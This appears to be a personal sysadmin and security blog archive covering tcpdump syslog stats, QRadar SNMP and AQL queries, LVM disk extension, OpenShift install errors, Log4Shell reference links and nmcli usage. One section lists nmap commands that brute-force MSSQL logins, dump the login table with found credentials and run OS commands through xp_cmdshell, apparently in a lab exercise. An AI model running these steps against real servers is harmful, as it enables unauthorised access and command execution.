Wednesday, August 17, 2022

Get IP count stats for syslog traffic

 tcpdump -nns0 -i any -c 100000 dst port 514 |awk '{print $3}' |cut -d. -f1-4 |sort -V |uniq -c |sort -n
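The same per-source aggregation as the one-liner above, written as an added example (not from the original post) that does not depend on the source being field 3 and that also handles IPv6 sources; the capture lines it runs on are constructed, not a real capture:

```shell
# Added example, not part of the original post: per-source packet counts from
# "tcpdump -nn" output, done in one awk pass instead of awk|cut.
# Differences from "awk '{print $3}' | cut -d. -f1-4":
#  - the source endpoint is found by locating the IP/IP6 token, because newer
#    tcpdump versions with "-i any" print "<time> <iface> In|Out IP ..." and
#    the source is then no longer field 3;
#  - the trailing ".port" is stripped instead of keeping four dot-separated
#    fields, so IPv6 sources (which contain no dots) are counted correctly.
syslog_source_counts() {
    awk '
        {
            src = ""
            for (i = 2; i <= NF; i++)
                if ($i == "IP" || $i == "IP6") { src = $(i + 1); break }
            if (src == "") next          # not an IP packet line
            sub(/\.[^.]+$/, "", src)     # drop ".port" (or ".syslog" without -nn)
            count[src]++
        }
        END { for (s in count) printf "%7d %s\n", count[s], s }
    ' | sort -n
}

# Constructed sample of "tcpdump -nn -i any dst port 514" output, mixing the
# old and the new (interface + direction) line formats.
SAMPLE_CAPTURE='12:00:00.000001 IP 10.0.30.33.45123 > 10.0.30.5.514: SYSLOG local0.info, length: 80
12:00:00.000002 IP 10.0.30.33.45124 > 10.0.30.5.514: SYSLOG local0.info, length: 81
12:00:00.000003 IP 10.0.30.34.51000 > 10.0.30.5.514: SYSLOG auth.notice, length: 77
12:00:00.000004 IP6 2001:db8::1.514 > 2001:db8::5.514: UDP, length 60
12:00:00.000005 eth0  In  IP 10.0.30.34.51001 > 10.0.30.5.514: SYSLOG auth.notice, length: 77
12:00:00.000006 IP 10.0.30.33.45125 > 10.0.30.5.514: SYSLOG local0.info, length: 82'

# Count for one source address in the sample (used by the checks).
count_for() {
    printf '%s\n' "$SAMPLE_CAPTURE" | syslog_source_counts | awk -v want="$1" '$2 == want { print $1 }'
}

printf '%s\n' "$SAMPLE_CAPTURE" | syslog_source_counts
```

On a live box, feed it with tcpdump -nn -i any -c 100000 dst port 514 | syslog_source_counts; as with the original pipeline, nothing is printed until the -c packet count is reached because of the sort.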

Tuesday, August 9, 2022

QRadar: snmpwalk: Failure in sendto (Operation not permitted)

[root@console snmp]# snmpwalk -Os -c public -v 2c 127.0.0.1:8001 iso.3.6.1.2.1.1.1
snmpwalk: Failure in sendto (Operation not permitted)



I solved it by changing the port number to 8002 and adding iptables rules.

# Default iptables rules block 8001 traffic.

[root@console ~]# grep -HR 8001 /etc/* 2>/dev/null |grep REJECT
/etc/sysconfig/iptables:-A INPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A INPUT -p udp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p udp --dport 8001 -j REJECT

# solution

[root@console ~]# iptables -I INPUT -p udp -m udp --dport 8002 -j ACCEPT
[root@console ~]# iptables -I OUTPUT -p udp -m udp --sport 8001 -j ACCEPT

[root@console ~]# iptables-save

QRadar: extract test steps of a specific offense rule

 /opt/qradar/support/extractRules.py -o QRadarRules.tsv 

# psql -t -A -U qradar -c "SELECT rule_data FROM custom_rule WHERE id=100311" | xmllint --xpath "//rule/testDefinitions/test/text" - | perl -MHTML::Entities -pe 'decode_entities($_);' |sed -e 's/<[^>]*>//g'

QRadar: Ariel query for getting related usernames in an offense

 AQL query:

SELECT username FROM events  WHERE INOFFENSE(ID) GROUP BY username

QRadar: Ariel query for getting related remote IPs in an offense

AQL query for getting the remote IP addresses related to a specific offense:

select distinct destinationip from events where INOFFENSE(633) TIMES OFFENSE_TIME(633) AND eventdirection IN ('L2R', 'R2R') 


Tuesday, August 2, 2022

nmap scripts for mssql servers

 nmap -p 1433 10.0.30.0/24

nmap --script ms-sql-info -p 1433 10.0.30.33

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 10.0.30.33

nmap -p 1433 --script ms-sql-empty-password 10.0.30.33

nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" 10.0.30.33 -oN output.txt
gvim output.txt

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig" 10.0.30.33

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" 10.0.30.33

QRadar SOAR: How to increase partition size by using a new disk on RHEL with LVM

 Steps:

Steps to add a new hard disk to LVM on IBM Security SOAR appliance running Red Hat Linux with LVM support:

1. In vSphere client, add a new hard disk at Virtual Device Node SCSI (0: 1).

2. SSH to the server.

3. Get the host bus number:
sudo grep mpt /sys/class/scsi_host/host?/proc_name
The response is similar to
/sys/class/scsi_host/host2/proc_name:mptspi

4. Rescan for new disks on host bus 2:
echo "- - -" | sudo tee /sys/class/scsi_host/host2/scan

5. Make sure new disk /dev/sdb is added to the system:
sudo fdisk -l

6. Create a new partition on /dev/sdb with file system type 8e (Linux LVM):
sudo fdisk /dev/sdb

=======
Command (m for help): n
Select (default p): p
Partition number (1-4, default 1): 1
First sector (a-b, default a): [Enter to use the default value]
Last sector, +sectors or +size{K,M,G} (a-b, default b): [Enter to use the default value]
Command (m for help): t
Hex code (type L to list all codes): 8e
Command (m for help): p
Command (m for help): w
=======

7. Create a physical volume for LVM:
sudo pvcreate /dev/sdb1

8. Get the volume group name (VG Name):
sudo vgdisplay

9. Extend the 'resilient' volume group by adding in the physical volume of /dev/sdb1:
sudo vgextend resilient /dev/sdb1

10. Scan all disks for physical volumes:
sudo pvscan

11. Check the volume group name (VG Name) again to make sure free space is added:
sudo vgdisplay

12. Display the path of the logical volume (LV Path):
sudo lvdisplay

The following assumes that you want to split the new disk over the three logical volumes.

13. Extend the logical volume for multiple logical volumes:
sudo lvresize --resizefs --extents +80%FREE /dev/resilient/root
sudo lvresize --resizefs --extents +100%FREE /dev/resilient/co3

The previous commands allocate 80% of the extended space to the "/dev/resilient/root" logical volume, and then allocate the remaining 20% to the "/dev/resilient/co3" logical volume.

14. Display the disk space usage to ensure new space is added:
sudo df -h
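An added example (not part of the IBM procedure above) that emulates how the two lvresize calls in step 13 divide the free extents of the volume group: "+N%FREE" takes N% of what is free at that moment, so +80%FREE followed by +100%FREE hands the second volume the remaining 20%, whereas +80%FREE followed by +20%FREE would leave 16% of the new disk unused. On a real system the free-extent count comes from vgs --noheadings -o vg_free_count resilient; the value used here is constructed.

```shell
# Added example, not from the original procedure: emulate sequential
# "lvresize --extents +N%FREE" allocations from one volume group.
# Usage: plan_lv_split <free_extents> <lv>:<percent> [<lv>:<percent> ...]
# Assumes whole-extent arithmetic rounded down (an approximation of LVM's own rounding).
plan_lv_split() {
    free=$1; shift
    for spec in "$@"; do
        lv=${spec%%:*}
        pct=${spec##*:}
        grant=$(( free * pct / 100 ))   # N% of what is free *now*
        free=$(( free - grant ))
        printf '%s %d\n' "$lv" "$grant"
    done
    printf 'unallocated %d\n' "$free"   # extents the plan leaves unused
}

# Extents one LV (or "unallocated") receives under a plan, for checks.
extents_for() {
    want=$1; shift
    plan_lv_split "$@" | awk -v want="$want" '$1 == want { print $2 }'
}

# Constructed free-extent count of 1000 for the 'resilient' VG.
plan_lv_split 1000 root:80 co3:100   # step 13 as written: nothing left over
plan_lv_split 1000 root:80 co3:20    # a common mistake: 160 extents left over
```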


Reference:

 https://www.ibm.com/support/pages/node/1160644

Thursday, January 27, 2022

ERROR on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":

 Problem:

..

DEBUG vsphere_tag_category.category: Creation complete after 0s [id=urn:vmomi:InventoryServiceCategory:f49160e4-a017-404f-9ecf-88b93e02f300:GLOBAL]
DEBUG vsphere_tag.tag: Creating...                 
DEBUG vsphere_tag.tag: Creation complete after 0s [id=urn:vmomi:InventoryServiceTag:75e6da39-1493-4760-a360-5708375c1e49:GLOBAL]
DEBUG vsphereprivate_import_ova.import: Creating...
ERROR                                              
ERROR Error: failed to find provided vSphere objects: failed to find a host in the cluster that contains the provided datastore
ERROR                                              
ERROR   on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":
ERROR   44: resource "vsphereprivate_import_ova" "import" {
ERROR                                              
ERROR                                              
FATAL failed to fetch Cluster: failed to generate asset "Cluster": failed to create cluster: failed to apply Terraform: failed to complete the change

..

Root cause of the problem:

This issue was caused by trying to use a datastore that was not shared storage on a cluster with multiple hypervisors.


Sunday, January 23, 2022

Saturday, January 22, 2022

Bulma.io: the modern CSS framework that just works.

 Bulma is a free, open source framework that provides ready-to-use frontend components that you can easily combine to build responsive web interfaces.

 https://bulma.io/

Themes:

https://jenil.github.io/bulmaswatch/


Friday, December 31, 2021

libera.chat: new irc environment for opensource communities

In the past I was using the Freenode IRC server for getting support from open-source communities. After Freenode, I saw that some important communities moved to this environment. I want to share the details with you.

Server address:
/server irc.libera.chat 6667


You can connect with an irc client. IRC client suggestion: hexchat

Stats:

Saturday, December 11, 2021

CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)

 Plugin:

https://www.tenable.com/plugins/nessus/155999

 POC - Blog post:

https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability

Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package

Who is impacted?

Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable.

https://www.lunasec.io/docs/blog/log4j-zero-day/


X-Force Report URL:

https://exchange.xforce.ibmcloud.com/collection/Log4Shell-Zero-Day-Targeting-Java-Package-4daa3df4f73a51590efced7fb90bc949

netmiko: Multi-vendor network device library for python

github.com/ktbyers/netmiko: multi-vendor library to simplify CLI connections to network devices; can be especially helpful for SOAR projects

Create bootable Windows 11 iso on Ubuntu 20.04

 ❯ sudo dd bs=4M if=/mnt/hgfs/Ddd/Win11_English_x64v1.iso of=/dev/sdc conv=fdatasync  status=progress

Friday, October 8, 2021

Red Hat: nmcli usage notes

The following tests were performed on Red Hat Enterprise Linux 8.2.

nmcli is a tool that lets you check and manage the network settings of Linux systems from the command line through the NetworkManager service.

Show the active profiles:

#nmcli con show

Define a new profile:
Some of the parameters you can use when defining a profile: con-name, ifname, type, ipv4.address, ipv4.gateway

#nmcli con add con-name lab ifname eth0 type ethernet ipv4.method manual ipv4.address 172.25.250.11/24 ipv4.gateway

Update a profile:
Some of the parameters you can use when updating a profile:
connection.autoconnect, ipv4.dns, +ipv4.addresses

#nmcli con mod lab ipv4.dns 4.2.2.4
#nmcli con mod lab connection.autoconnect
#nmcli con mod lab +ipv4.addresses 10.1.1.1/24